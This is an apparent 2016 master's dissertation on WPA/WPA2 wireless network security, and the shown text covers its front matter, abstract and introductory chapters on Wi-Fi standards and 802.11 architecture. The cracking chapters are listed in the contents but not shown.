I

SECURITY IN LOCAL WIRELESS NETWORKS (WPA/WPA2)

LOUKAS TRIANTAFYLLOPOULOS

MA COMPUTER SCIENCE

2016

LOUKAS TRIANTAFYLLOPOULOS MA COMPUTER SCIENCE 2016

 SECURITY IN LOCAL WIRELESS NETWORKS (WPA/WPA2)

LOUKAS TRIANTAFYLLOPOULOS

A dissertation submitted in partial fulfillment of the requirements of MARCONI

University for the degree of MA Computer Science

MARCONI UNIVERSITY
MARCH 2016
 i

ACKNOWLEDGEMENTS

First and foremost, I wish to express my gratitude to my wife and two little sons for their continual
support, not only during the write-up of this dissertation, but also for the entire duration of my MSc
studies.
 ii

TABLE OF CONTENTS

ACKNOWLEDGEMENTS ................................................................................................................................ i
LIST OF TABLES & GRAPHS ..........................................................................................................................iv
LIST OF IMAGES ............................................................................................................................................v
LIST OF ABBREVATIONS...............................................................................................................................vi
ABSTRACT.................................................................................................................................................. viii
INTRODUCTION - CHAPTER 1....................................................................................................................... 1
LITERATURE REVIEW ................................................................................................................................... 3
CHAPTER 2 - WIRELESS NETWORKS ............................................................................................................. 3
2.1 About WI-FI ....................................................................................................................3
2.2 About Wireless Networks ...............................................................................................4
2.2.1. Advantages of wireless networks ................................................................................4
2.2.2. Disadvantages of wireless networks ............................................................................6
2.3. Who needs wireless connection .....................................................................................6
2.4 Structural Elements ........................................................................................................7
2.5 Wireless Networking Standards ......................................................................................8
2.6. The 802.11 standard ......................................................................................................9
2.6.1. 802.11 versions ......................................................................................................... 10
2.6.2 Architecture of IEEE 802.11 ........................................................................................ 11
2.6.3. Services of IEEE 802.11 .............................................................................................. 12
2.6.4. IEEE 802.11 Protocol Architecture ............................................................................. 13
CHAPTER 3: SECURITY IN WIRELESS NETWORKS ........................................................................................17
3.1. What is encryption? ..................................................................................................... 17
3.1.1. Symmetric key encryption ......................................................................................... 18
3.1.2. Public key encryption ................................................................................................ 18
3.2. Wireless network encryption protocols ........................................................................ 18
3.2.1. WEP encryption......................................................................................................... 18
3.2.2. WPA encryption (Wi-Fi Protected Access) .................................................................. 19
3.2.3. WPA or WEP ............................................................................................................. 21
3.2.4. WPA2 (Wi-Fi Protected Access Version 2) .................................................................. 21
3.3. Types of Attacks on wireless networks ......................................................................... 22
3.3.1. Passive attacks.......................................................................................................... 22
3.3.2. Active attacks ........................................................................................................... 22
 iii
EMPIRICAL PART 1 ......................................................................................................................................23
CHAPTER 4: LOCATION ANALYSIS IN TERMS OFWIRELESS NETWORKS SECURITY.......................................23
4.1. About Wardriving ........................................................................................................ 23
4.2. Wardriving Equipment ................................................................................................. 23
4.2.1. Why a smartphone.................................................................................................... 24
4.2.2.Wigle Wifi Wardriving Android Application ................................................................ 24
4.3. Wardriving analysis in and around central town of Tinos Greek island ......................... 25
4.3.1.Preparation process for analysis of data..................................................................... 27
4.4. Security analysis of wireless networks in and around central town of Tinos Greek Island-
Results................................................................................................................................ 28
4.5. Channel analysis of wireless networks in and around central town of Tinos Greek Island-
Results................................................................................................................................ 29
EMPIRICAL PART 2 ......................................................................................................................................30
CHAPTER 5: CRACKING SECURITY IN WIRELESS NETWORKS .......................................................................30
5.1. About Linux, a good environment ................................................................................ 30
5.2.About Kali linux, the next generation of Backtrack ........................................................ 30
5.3. Equipment for Cracking Wireless Networks Security .................................................... 31
5.4. Preparation of attack ................................................................................................... 33
5.4.1.Dictionary attack ....................................................................................................... 33
5.4.2. Pre-computed hashes................................................................................................ 33
5.5. TheAircrack-ngsuite ..................................................................................................... 33
5.5.1.About Airmon-ng ....................................................................................................... 34
5.5.2 About Airodump-ng ................................................................................................... 34
5.6. Airolib-ng &Aircrack-ng ................................................................................................ 38
5.7. coWPAtty .................................................................................................................... 39
5.8.genpmk & coWPAtty..................................................................................................... 40
5.9. Comparison of attacks ................................................................................................. 42
CONCLUSIONS ............................................................................................................................................45
BIBLIOGRAPHY ...........................................................................................................................................46
 iv

LIST OF TABLES & GRAPHS

TABLE 1. Wireless networks in and around central town of Tinos Greek island – Security Analysis of
data……………………………………………………………………………………………………..28
TABLE 2. Wireless networks in and around central town of Tinos Greek island – Channel Analysis of
data…..……………………………………………………………………………………………….....29
TABLE 3: A comparative table of the results of used in project attacks……………..………………..42

GRAPH 1. Wireless networks in and around central town of Tinos greek island – Security Analysis of
data……………………………………………………………………………………………..…..…..28
GRAPH 2. Wireless networks in and around central town of Tinos Greek island – Channel Analysis of
data….……………………………………………………………………………………………….....29
GRAPH 3. Time taken to crack WPA/WPA2…………………..……………………………………..43
GRAPH 4: Time taken to crack WPA/WPA2 via dictionary attack…………..……………………...43
GRAPH 5: Time to pre-calculated hashes (seconds)………………………..………………………...44
GRAPH 6: Time taken to crack WPA/WPA2 via pre-calculated hashes……………..………………44
 v

LIST OF IMAGES
Image 1 – Diagram of a Computer Network......................................................................................... 1
Image 2 - Wi-Fi Alliance logo ............................................................................................................. 3
Image 3- Wi-Fi Certified logo .............................................................................................................. 3
Image 4 - Representation of Ad-hoc mode ......................................................................................... 11
Image 5 - Representation of Infrastructure BSS mode ........................................................................ 11
Image 6 - Infrastructure mode and an ESS ......................................................................................... 12
Image 7 - 802.11 and OSI Model ....................................................................................................... 13
Image 8 - 802.11 MAC Frame Format ............................................................................................... 14
Image 9 - Frame Control Field ........................................................................................................... 15
Image 10 - Sequence Control Field .................................................................................................... 16
Image 11 - A simple Encryption-Decryption system .......................................................................... 17
Image 12- Standard WEP Encryption Process using RC4 algorithm with XOR operation ................. 19
Image 13 - WPA-PSK mode .............................................................................................................. 19
Image 14 - WPA- Enterprise mode .................................................................................................... 20
Image 15 - WPA implementation (*) ................................................................................................. 20
Image 16 - WPA2 implementation ..................................................................................................... 21
Image 17 - Vodafone Smart 4 Review................................................................................................ 23
Image 18 – Wigle Wifi Wardriving Application at Google Play Store................................................ 23
Image 19 – Wigle Wifi Wardriving Android Application Framework ................................................ 24
Image 20 - Data tab in Wigle Wardriving app .................................................................................... 25
Image 21 - Wireless Networks in and around central town of Tinos Greek Island – Google Earth
view ................................................................................................................................................... 26
Image 22 - Wardriving followed paths in and around central town of Tinos Greek Island – Google
Earth view ......................................................................................................................................... 26
Image 23 - Step 1 preview ................................................................................................................. 27
Image 24 - Step 2 preview ................................................................................................................. 27
Image 25 - Uniformly classified data of CSV file ............................................................................... 27
Image 26 - Table of data after the right modification.......................................................................... 28
Image 27 -Tux the penguin, mascot of Linux ..................................................................................... 30
Image 28 - Kali Linux logo ................................................................................................................ 31
Image 29 - Samsung R530 preview .................................................................................................... 32
Image 30 - HP Compaq 610 preview ................................................................................................. 32
Image 31 - Huawei Echolife HG520c preview ................................................................................... 32
Image 32 - The wireless card in monitor mode ................................................................................... 34
Image 33 - Collection of Initialization Vectors (IVs) .......................................................................... 35
Image 34 - "Concept" of the handshake packet .................................................................................. 36
Image 35 - "Concept" of the handshake packet .................................................................................. 36
Image 36 - Aircrack-ng in process ..................................................................................................... 37
Image 37 - Aircrack-ng in process ..................................................................................................... 37
Image 38 - Attack using database ....................................................................................................... 38
Image 39 - Attack using database ....................................................................................................... 38
Image 40 - CoWPAtty in process ....................................................................................................... 39
Image 41 - CoWPAtty in process ....................................................................................................... 39
Image 42 - Preparation with genpmk .................................................................................................. 40
Image 43 - Preparation with genpmk .................................................................................................. 41
Image 44 - Attack using pre-computed hashes .................................................................................. 41
Image 45 - Attack using pre-computed hashes .................................................................................. 42
 vi

LIST OF ABBREVATIONS

AP (Access Point): A router, switch or hub device that manages multiple wireless connections to a
network.
Ad hoc: The mode in which a computer can be connected to one another to form a network directly,
without the interposition of an AP.
ARP: (Address Resolution Protocol): a network layer protocol used to convert an IP address into a
physical address (called a DLC address), such as an Ethernet address.

Authentication: The certification process for the identity of a station.

Authenticator: The device that initiates the connection of a station with an another or with a network
(typically an AP).

Beacon: Small, often inexpensive device that enables more accurate location within a narrow range
than GPS, cell tower triangulation and Wi-Fi proximity.

BSSID (Basic Service Set Identifier): MAC address of access point.

CCMP (Counter-Mode / Cipher Block Chaining Message Authentication Code

Protocol): Encryption protocol that’s used in WPA2, based on AES block cipher.

Dictionary: A set of words which will power an attack.

EAP (Extensible Authentication Protocol): is a general protocol for authentication that also supports
multiple authentication methods, such as token cards, Kerberos, one-time passwords, certificates, public
key authentication and smart cards.

EAPOL (EAP Over LAN): Application of the EAP in networks.

ESSID (Extended Service Set Identifier): The network name.

Fragmentation: The process in which an information packet breaks up into smaller packets when
sending and which will be linked at their destination.

Frame: We can consider that “frame” is the same as a packet. The "definition" is that when there is a
message exchange in layer 2 of the OSI model we refer it as to frames, and when the message exchange
is made in layer 3we refer to it as packets.

Handshake: Process of a series of questions and answers for the purpose of the identification of
supplicant.

ICV (Integrity Check Value): A checksum capable of detecting modification of an information system
(IS).

Infrastructure: The mode of operation in which a computer is connected at first to an AP and then to
the network.

IV (Initialization Vector): a non-secret binary vector used as the initializing input algorithm for the
encryption of a plaintext block sequence to increase security by introducing additional cryptographic
variance and to synchronize cryptographic equipment.
 vii
KCK (Key Confirmation Key): integrity control key that protects the handshake messages.

KEK (Key Encryption Key): encrypted key that protects the handshake messages.

MAC Address (Media Access Control Address): is a 48-bit-long address that uniquely identifies each
physical machine on an Ethernet local area network.

MIC (Message Integrity Code): data field appended to the plaintext for checking the integrity
(generated by the Michael algorithm).

MK (Master Key): Within a hierarchy of encrypting keys and transaction keys, the
highest level of key-encrypting key.

Monitor Mode: The operational mode of a Wi-fi device which receives packets circulating on the Wi-
Fi network. Also known as raw mode.

MPDU (Mac Protocol Data Unit): A data packet before fragmentation.

MSDU (Mac Service Data Unit): A data packet after fragmentation.

NACK (Negative Acknowledgement): A Negative-Acknowledge Character is a transmission control

character sent by a station as a negative response to the station with which the connection has
been set up.

Packet: a sequence of binary digits, including data and control signals, that is transmitted and switched
as a composite whole.

PMK (Pairwise Master Key): master key in the pairwise key hierarchy.

PRGA (Pseudo Random Generation Algorithm): the production process of the key stream on RC4.

PSK (Pre-Shared Key): key generated by a password replacing a PSK on WPA-PSK mode.

PTK (Pairwise Transient Key): key generated by the PMK.

Rainbow Tables: prepared word hashes for use in brute force or dictionary attacks.

SSID (Service Set Identifier): wireless network identifier.

TK (Temporary Key): key for data encryption on unicast traffic.

TKIP (Temporal Key Integrity Protocol): encryption protocol used in WPA and based on RC4
algorithm (which also used in WEP).

TMK (Temporary MIC Key): key for data integrity on unicast traffic (TKIP).
WEP (Wired Equivalent Privacy): default encryption protocol that is used on 802.11 networks.
Wi-Fi (Wireless Fidelity):the well known wireless technology.

WPA, WPA1 (Wi-Fi Protected Access): The initial version of WPA, sometimes called WPA1, is
essentially a brand name for TKIP. TKIP was chosen as an interim standard because it could be
implemented on WEP hardware with just a firmware upgrade.

WPA2: The trade name for an implementation of the 802.11i standard, including AES and CCMP
 viii

ABSTRACT

The purpose of this thesis is to describe the way wireless networks work, as well as their encryption
protocols and addresses the threat of security violations. More precisely, all active wireless networks
within and around central town of Tinos Greek island will be searched for and registered through the use
of specific functions and the WiGLE android application. Dictionary and precomputed hashes attacks
will be created and finally the security of an encrypted WPA/WPA2 wireless network will be violated.
More specifically, chapter two describes the human need for remote communication, the definition,
the architecture, the categories that wireless networks are divided into and the differences between
wireless and wired networking.
Chapter two also describes the advantages and disadvantages in using wireless networks, analyzes
wireless devices being used and describes wireless networking standards. Moreover, it gives the analysis
of publications and architecture of the standard 802.11.
Chapter three refers to the types of encryption algorithms, describes and compares in detail the
encryption protocols WEP and WPA/WPA2 and analyzes two types of attacks.
Chapter four refers to the first empirical part of this thesis, about location analysis in terms of
wireless networks security in and around central town of Tinos Greek island. The analysis of the
extracted CSV file presents statistical information about cryptographic methods and the channels in use.
Chapter five describes the violation of wireless security. It presents in detail the tools used for
searching, registrating and violating wireless networks. Based on the statistics from the first empirical
part of this thesis, a wireless network SSID with the most common cryptographic method (WPA2) is
analyzed using some powerful security attacks. The effects of the attacks will be compared and the
results will be analyzed in detail.
 INTRODUCTION - CHAPTER 1
From the beginning of time, the need for communication regarding the exchange of information has
been a viral asset for survival. However, the element of flexibility was achieved only in the 20th century
with the advent of remote communication. The invention and use of telephones, televisions, radio signals
and generally computer networks are those elements which have contributed to the particularly rapid
growth of remote communication.
A computer network is a communication data system that connects two or more computers to each
other and to other remote devices. The term “connect” refers to the ability of exchanging information.
A computer network consists of the following components:
 Terminal Nodes: This component checks the network resources (hardware and software)
 Sub-Networks: Physical means, communication protocols, typology, terminal nodes, resources
that differ among different sub-networks.
 Interface devices: These devices connect heterogeneous sub-networks in order to achieve
successful communication of terminal nodes which are located in different sub- networks.

Image 1 – Diagram of a Computer Network

Source: www.conceptdraw.com

Computer networks are divided into the following categories:

1. Wired or Wireless networks, based on physical means of interconnection.
2. Private or Public networks, based on telecommunication service provider.
3. Wide area (WAN), Local area (LAN) , Metropolitan area (MAN) and Personal area (PAN)
networks
4. Switched or Shared networks, based on technical promotion of information.
The difference between wired and wireless communication is the physical means that is needed to
transfer information from one point to another. Wireless networks don’t use wires as transmission means

[1]
but electromagnetic waves with frequency usually of 2,4GHz and 5 GHz. For normal communication
between wired and wireless networks, it’s important to use specific standards.
As Switched network is called a physical network in which an infrastructure device (called a switch)
directs packets based on their destination. This improves network performance by ensuring that only the
hosts that need to receive a given packet actually see it. In other hand, as shared network is called a
network in which every packet is received by every device on the network.
Wireless communication is, undoubtedly, the fastest growing segment of the communications
industry. Mobile telephones and satellite communications are characteristic examples of wireless services
with the most rapid expansion worldwide and are important tools for the development of countries.

[2]
 LITERATURE REVIEW

CHAPTER 2 - WIRELESS NETWORKS

2.1 About WI-FI

With the development of standards by the IEEE (Institute of Electrical and Electronics Engineers -
non-profit organization) and the emergence of large numbers of wireless device manufacturers, it was
evident that there was a need to ensure compatibility between different devices and also buyer protection.
For this reason, the non-profit Wi-Fi Alliance (WECA) was founded in 1999, its main task was
to promote Wi-Fi technology and certify Wi-Fi products if they conformed to certain standards
of interoperability.

Image 2 - Wi-Fi Alliance logo

Source: commons.wikimedia.org

The Wi-Fi Alliance organization has established a test suite that defines how member products will be
tested by an independent test lab. Products that pass these tests are entitled to display the Wi-Fi
trademark, which is a seal of interoperability. These Wi-Fi interoperability tests are designed to ensure
that hardware from different vendors can successfully establish a communication session with an
acceptable level of functionality.

Image 3- Wi-Fi Certified logo

Source: www.wi-fi.org

[3]
 This trademark is a certification for any prospective buyer of a device and a guarantee of its use.
The consumer buying a device with this logo, has the warranty that this device will work with every other
device that also has the same trademark.

2.2 About Wireless Networks

A wireless network is any type of computer network that uses wireless data connections for
connecting network nodes.
Wireless networking is a method by which homes, telecommunication networks and business
installations avoid the costly process of introducing cables into a building, or as a connection between
various equipment locations, allowing data exchange.
With its initial connection, wireless networks, cause of plethora of disadvantages and lack of
standards. As a result, it was not so common to the general public. During the last decade we have seen
an explosive growth of wireless networks. Nowadays wireless networks occupy an important piece of the
network market. Due to the cheap cost of equipment compared to wired networks and the relative ease of
deployment, the adoption rate of wireless will soon exceed that of wired networks. In organizations and
corporations the idea has been developed that the local wireless networks strengthen considerably the
traditional wired networks, especially regarding the requirements of portability, relocation and the
coverage of locations where the installation of wires is difficult or impossible.
Examples of wireless networks include cell phone networks, Wi-Fi local networks and terrestrial
microwave networks.

2.2.1. Advantages of wireless networks

The rapid spread of wireless networks is clearly due to the significant advantage which they have.
We can refer to the following advantages:
a) Increased Mobility
Increased mobility is by far the biggest attraction that wireless networking holds for most
businesses. Being able to sit at any terminal, anywhere in the building and access the server is a great
advantage. When laptops were developed, because of the new mobility convenience factor that they
brought within them, this gave added impetus to the advantages of being able to work anywhere within
the range of the wireless network signal. It means that not only can employees now access information
from the server, wherever they are on the premises, but it also enables colleagues to collaborate and share
information in meetings held anywhere; either in a corner of the office, a meeting room, or even the staff
canteen. It enables total mobility.
b) Enabling BYOD
The increased mobility factor both enables and facilitates the Bring Your Own Device (BYOD)
phenomenon, which more and more businesses are now taking advantage of laptops, tablets, and smart
phones that belong to individual employees are now being brought into the workplace and are being
given access rights to the wireless network. As well, as making it more convenient for employees to carry
out their tasks, BYOD also represents a potential cost saving, as businesses no longer have to fund the
hardware cost of the devices themselves.
c) Increased Productivity
Another important by-product of the increased mobility factor is that it promotes increased
productivity, allowing employees to collaborate where and when they need to. It brings freedom of
operation and speeds up the working process. But there is another factor too, and that is that employees
[4]
take their device’s home with them, and can work, (as many do), in their own time when it’s convenient
to do so.
d) Public Wi-Fi Hotspots
Wireless networking has also gone into the public domain, with Wi-Fi hotspots being available in
many high street coffee shops, hotels, railway stations, airports, universities, hospitals, etc. It enables
people to get onto the Internet when they’re away from the office, or away from home. People can pick
up their emails, both social and business, and if their place of work allows, can also connect into the
business network remotely.
e) Scalability
One of the inherent problems with a wireless network is coping with expansion. Having to add
additional cabling, and reroute existing cables, can be a disruptive and costly process. Whilst every
company should plan ahead when installing a wireless network, it is almost impossible to forecast future
requirements accurately unless sound planning is carried out.
There’s no such problem with a wireless network. Being able to add new users is no more difficult
than having to issue a new password, and update the server accordingly. It’s fast, and it’s relatively
convenient. It also means that offices can be relocated within the building with consummate ease,
furniture can be readily moved around, and, of course, employees can sit wherever they need to.Not only
is it so much more convenient to add new users to a wireless network, but it seldom involves any
additional expenditure.
f) Guest Use
Having a wireless network also means that a business can provide secure network access to visiting
colleagues from other sites within the organization. It enables them to access the data they need and pick
up and respond to their emails.
It also grants Internet access to visiting customers and suppliers. It’s now something that most
business people who have reason to travel, have come to expect. It’s also how most public Wi-Fi hotspots
grant Internet access to their guests.
g) Using VOIP
Another one of the benefits of having a wireless network is that it can be used to make telephone calls
using voice over the Internet protocol. VoIP calls are often free, depending on the country and the
devices you are calling, and are considerably cheaper than using conventional technology to make
international calls.
h) WI-FI is cost effective
Using wireless technology rather than having a hard wired network can be much more cost-
effective. The larger the network, both in terms of area and users, the more expensive a hard wired
network will be to install. It’s not just the amount of cabling, but the actual cost of the labour to install the
raceways, and chase the cabling all through the premises; through walls, up and down different floors etc.
Once a wireless network is in place, and even if it costs a little more initially to install, maintenance
costs are lower, and there are normally no additional costs involved in scaling up, unless the signal needs
to be boosted.

[5]
 i) Health and safety
Because there are no wires involved with a wireless connection, the potential risk of tripping over any
trailing cables that wired connectivity requires, can be avoided altogether.

2.2.2. Disadvantages of wireless networks

The use of wireless networks transferring information makes them vulnerable to many phenomena of
interference which affects user communication. Wireless networks are far from perfect and there are a
number of disadvantages that an individual or organization may face when using a wireless network.
The disadvantages of wireless networks can be summarized as follows:

a) Security
To combat this consideration, wireless networks may choose to utilize some of the various
encryption technologies available. Some of the more commonly utilized encryption methods, however,
are known to have weaknesses that a dedicated adversary can compromise.

b) Range
The typical range of a common 802.11g network with standard equipment is on the order of tens of
meters. While sufficient for a typical home, it will be insufficient in a larger structure. To obtain
additional range, repeaters or additional access points will have to be purchased. Costs for these items
can add up quickly.

c) Reliability
Like any radio frequency transmission, wireless networking signals are subject to a wide variety of
interference, as well as complex propagation effects that are beyond the control of the network
administrator.

d) Speed
The speed on most wireless networks (typically 1-54 Mbps) is far slower than even the slowest
common wired networks (100Mbps up to several Gbps). However, in specialized environments, the
throughput of a wired network might be necessary.

e) Electricity Consumption
Wifi Routers consume more electricity as compared to Broadbands. The Electricity is consumed to
spread Wifi Signals over the Area of 40 Meter.

2.3. Who needs wireless connection

A wireless network has many features. During the last decades wireless networks have been used in
applications on various categories such as educational applications, professional or household
applications.
Some important features of wireless networks are:
1. With a wireless network it is very easy to share Internet connection from all Wi-Fi devices.

[6]
 2. If a company occupies more than one building, there is legitimate communication between their
networks. The use of wireless switching is the most simple and economical solution, with the only
disadvantages being a possible security breach.
3. In conference rooms (meeting rooms) it is possible to access information from the corporate
network.
4. Hot spots: Aside from the internal network, a company can expand its customer base, thus its
profits, offering various services at selected locations on its premises. Such places can found in
restaurants, cafés, hotels, airports, hospitals, railway stations, etc.
5. Doctors and nurses use wireless handheld devices to have direct access to personal files of patients
and to medical libraries.
6. Implementation of networks is possible in old buildings where the wiring is unprofitable or
restrictive.
7. Implementation of wireless networks as a backup of wired systems installations.

2.4 Structural Elements

i) End-Users devices
Devices are the source of communication between the user and the network. The communication in a
wireless network is done through devices supporting wireless transmission. Such devices are:
1. Desktop/laptop computer
2. Palmtop, handheld PCs and printers
3. Smartphones
4. IP Cameras
ii) Network Cards
Network card allows communications between computers over the network. It is a device of the
physical layer and the data link level of the standard OSI, since it provides access to the physical network
medium and a low-level addressing system through the use of MAC addresses.
iii) Access Points
In computer networks, a device that connects the wireless communication devices to each other to
form a wireless network is called “Wireless Access Point”. The access point is typically connected to a
wired network and it can transfer data between wireless and wired devices. Many access points can be
connected together to form a larger network that enables roaming.
In contrast to this model, a network in which client devices communicate by themselves, without the
need for an access point known in advance, is called “Ad Hoc Network”.
iv) Transmission Means
The wireless technologies using radio frequencies that have been given for industrial, scientific and
medical purposes. In contrast to all other parts of the radio spectrum, the use of transmitter on these
frequencies does not require any license.
The IEEE 802.11 standard defines 13 channels in the frequency of 2.4 GHz. The wireless networks
throughout local areas broadcast on these channels in a way that reduces interferences and increases data
integrity.

[7]
v) Antennas
Antenna is a device that allows the effective transmission and reception of radio waves, based on
the phenomenon of electromagnetic induction. When an antenna operates as a receiver, it receives radio
waves and converts them to AC power. On the other hand, when antenna operates as a transmitter, it
takes AC and converts it respectively to radio waves.
Antennas can be broadly classified as omnidirectional and directional antennas, depending on the
directionality.
Omnidirectional antennas are most commonly are used to create hot spots by transmitting a signal
over a large area in all directions or receiving signals in all directions when the transmitting location is
unknown or close by. Omni Wi-Fi antennas do not need to be pointed in a particular direction since their
radiation cone is 360 degrees, working in all directions.
Directional antennas as the name implies refers to signal coverage in a specified direction. Unlike
omnidirectional antennas, directionals must be aimed in the direction of the signal transmitter or receiver
which can be for example a router or Wi-Fi hotspot. When it comes to aiming the antenna the user must
be right on the signal for the best strength and quality.

2.5 Wireless Networking Standards

With continuous technological evolution developed various wireless standards. The most common are:
 IEEE 802.111,
 IEEE 802.162,
 HiperLan3,
 Openair4,
 HomeRF5,
 Bluetooth6.
Each standard has a different application, so we can say that they complement each other rather than
competing against each other. Bluetooth and the HomeRF designed for short-distance links, connection
between devices and their peripherals, IEEE 802.11 to implement wireless local networks and IEEE
802.16 to implement wider wireless metropolitan networks.
Let’s see concisely the above standards and their characteristics. The most important of these, IEEE
802.11, is going to be emphasized and described in detail.

A) IEEE 802.16 standards

In 2003, the IEEE adopted the standard known as 802.16 WiMAX to satisfy the requirements for
wireless broadband access (steadily) and high speed over a long distance. As with the standards of the
series 802 for wireless LANs, so the 802.16 defines a family of standards with options for specific
settings. Conversely with other wireless networks that allow transmission with only one range frequency,
the WiMAX allows data transfer using multiple frequencies. It operates in the frequency range of 10 - 66
GHz and it has data transfer rate 120 Mbps.
1
For more information : en.wikipedia.org/wiki/IEEE_802.11
2
For more information: en.wikipedia.org/wiki/IEEE_802.11
3
For more information: en.wikipedia.org/wiki/HiperLAN
4
For more information: www.labs.hpe.com/personal/Jean_Tourrilhes/Linux/Linux.Wireless.std.html
5
For more information: en.wikipedia.org/wiki/HomeRF
6
For more information: en.wikipedia.org/wiki/Bluetooth
[8]
 A significant difference of the IEEE 802.16 in relation to IEEE 802.11 is that the former can be used
with much lower data rates of 50 Mbps.
B) Openair standard
OpenAir was an early wireless standard promoted by the Wireless LAN Interoperability
Forum implemented predominantly by Proxim Wireless devices. It operated in the 2.4GHz ISM band and
used frequency hopping with 0.8 and 1.6 Mbit/s bit rates via 2 or 4 bits per symbol /* modulation. The
protocol used is CSMA / CA and based on the exchange RTS / CTS packets.
C) Hiperlan standard

The HiperLan is a standard for wireless networking in frequency band 5.1 – 5.3 GHz and developed
in 1996 by the ETSI (European Telecommunications Standards Institute).
There are the following four versions:
1. HiperLan / 1
2. HiperLan / 2,
3. HiperAccessand
4. HiperLink
Due to competition from IEEE 802.11, which was simpler to implement and as a result made it faster
to market, HiperLAN never received much commercial implementation. Much of the work on
HiperLAN/2 has survived in the PHY specification for IEEE 802.11a, which is nearly identical to the
PHY of HiperLAN/2. HIPERACCESS was intended as a last-mile technology. HIPERLINK was
intended as a short-range point-to-point technology at 155 Mbit/s.
D) HomeRF SWAP standard

HomeRF was a wireless networking specification for home devices. It was developed in 1998 by the
Home Radio Frequency Working Group, a consortium of mobile wireless companies that
included Proxim Wireless, Intel, Siemens AG, Motorola, Philips and more than 100 other companies.
The SWAP model has an operating frequency of 2.4 GHz, It uses the technique FHSS, with transmission
rates of 1 and 2 Mbps.
E) Bluetooth standard

Bluetooth is a wireless technology standard for exchanging data over short distances from fixed and
mobile devices, it also builds personal area networks (PANs). Invented by telecom vendor Ericsson in
1994, it was originally conceived as a wireless alternative to RS-232 data cables. It can connect several
devices, overcoming problems of synchronization. It uses the technique FHSS, with operating frequency
2.4 GHz, with a range of up to 200 m and data rate that reaches 3 Mbps.

2.6. The802.11 standard

IEEE 802.11 is a set of standards for a wireless local area network (wlan). The standard is better
known as Wi-Fi. IEEE 802.11 comprises of a number of standards.
The original 802.11 standard was published in 1997. This standard provided a data speed of 1 or 2
Mbit/s. The standard operates in the nearly worldwide available 2.4 GHz band ranging from 2400 -
2483.5 MHz. The standard uses either frequency hopping or coding (direct sequence spread spectrum)
technology to make the transmissions robust.

[9]
 2.6.1.802.11 versions
Since the original version, the standard has been implemented in various publications, defined by
letters.
 802.11a and 802.11h: The 802.11a extension to 802.11 was developed to make use of the lower
part of the 5 GHz band. The standard has a maximum bit rate of 54 Mbit/s using OFDM. The
allocation in the 5 GHz band for RLAN was later extended. The 5 GHz band ranging from 5150-
5350 and from 5470 - 5725 MHz can be used nowadays in most parts of the world. However,
equipment has to detect and avoid radar systems that use the band and need to have transmit
power control. The 802.11h standard was developed to cater for these provisions.
 802.11b: The IEEE 802.11 standard became popular after the publication of the 802.11b
extension in 1999. This extension to the original standard provides a maximum bit rate of 11
Mbit/s. The bit rate will be decreased to 5.5, 2 or 1 Mbit/s if the link quality decreases. The
802.11b standard uses direct sequence spread spectrum coding.
 802.11e: The IEEE 802.11e standard provides a set of Quality of Service features including
priority of data streams. This standard is mainly of relevance for time critical applications, such as
voice and streaming multimedia.
 802.11f (cancelled): IEEE 802.11f was a recommendation to ease handovers between access
points of different firms. The recommendation is withdrawn.
 802.11g : The 802.11g standard was a further development of the standard to improve the bit rate
if the link quality allows. The maximum bit rate is 54 Mbit/s. This bit rate can only be achieved if
the user is in the vicinity of the access point.
 802.11i:IEEE 802.11i enhances authentication and encryption. The original standard included
WEP (Wired Equivalent Privacy) which proved to be vulnerable. The improved version in IEEE
802.11i is commonly known as WPA2. An intermediate version called WPA (Wi-Fi Protected
Access) was introduced after the security issues with WEP were shown. WPA uses a subset of
IEEE 802.11i.
 802.11j: IEEE 802.11j is an amendment to the IEEE 802.11 standard for the Japanese market. It
allows Wireless LAN operation in the 4.9 to 5 GHz band.
 802.11k:IEEE 802.11k is an amendment to the standard for radio resource management. It allows
exchange of radio and network information. This information can be used by the client to switch
to the best available access point.
 802.11n: IEEE 802.11n is a standard that further improves the data throughput. The throughput is
increased to a maximum net bit rate of 600 Mbit/s. This through put is achieved by using more
than one channel (channel bonding) and advanced antenna technology (MIMO).
 802.11r: IEEE 802.11r adds support for roaming to the standard. This makes seamless
handovers possible in larger areas with WiFi coverage.
 802.11s: IEEE 802.11s defines how traffic can be delivered over self-configuring multi-hop
topologies to create a WLAN mesh network.
 802.11z: IEEE 802.11z is a mechanism to directly transfer data between two Wi-Fi clients that are
part of the same Wi-Fi network.
 802.11ac: IEEE 802.11ac Gigabit Wi-Fi is specifically designed to increase the bit rate in the 5
GHz band. This band offers more channels with a better separation than the 2.4 GHz band. IEEE
802.11ac makes channel bonding possible up to a channel width of 80 MHz, and even 160 MHz
under certain conditions. IEEE 802.11ac further uses MIMO and more efficient data encoding
mechanisms to increase the maximum bit rate up to 6.93 Gbit/s under certain specialized
conditions.

[10]
  802.11ad: IEEE 802.11ad is specifically designed for use in the unlicensed 60 GHz band. In this
band is far more overall bandwidth available than in the 2.4 and 5 GHz band. The development of
the standard started in the Wireless Gigabit Alliance (WiGig), but their work is now moved into
the IEEE 802.11ad specification.
 802.11af : IEEE 802.11af is an amendment that uses white spaces in the TV bands. It is also
known as White-Fi.

2.6.2 Architecture of IEEE 802.11

The smallest part of a wireless network is a basic service group called “Basic Service Set
(BSS)”.This consists of a number of stations that perform the same MAC protocol and compete for
access to the same shared wireless medium. Each BSS has a coverage area called “Basic Service Area”
and is determined by the technical characteristics of devices and antennas. Each station belongs to only
one BSS ,i.e. located within the wireless range of only those stations located in same BSS and is divided
into two operating modes:
Independent BSS or Ad-hoc mode
It is the simplest case creating a wireless network, where each wireless station communicates directly
with all other stations. The creation of an ad-hoc network is very easy and quick, so it is usually used in
cases requiring the creation of a data exchange network for a limited time. The possibilities of this type of
network in terms of safety are quite limited regarding the Infrastructure BSS.

Image 4 - Representation of Ad-hoc mode

Source: www.techtolink.com.hk

Infrastructure BSS
Infrastructure wireless networks vary from the ad-hoc, because of the use of access points. In
infrastructure mode, a base station acts as a wireless access point hub, and nodes communicate through
the hub. The hub usually, but not always, has a wired or fiber network connection, and may have
permanent wireless connections to other nodes.

Image 5 - Representation of Infrastructure BSS mode

Source: ardidudidam.blogspot.com
[11]
The use of access point provides two significant advantages:
 The radius of the BSS service area determined by the distance from the access point. This means
that each station is sufficient if it is in range of the access point.
 The structure of the Infrastructure BSS enables network management from a central node and
provides great flexibility in security. This is due to the existence of a central node in the network
and the way in which a wireless station is connected to the access point to communicate with the
rest of the network.

Extended Service Set (ESS): “Extended Service Set” is a component of the

IEEE 802.11 WLAN architecture that extends the range of mobility to a single Basic Service Set (BSS).
An Extended Service Set (ESS) is a set of two or more BSSs that form a single sub network.

Image 6 - Infrastructure mode and an ESS

Source: technet.microsoft.com

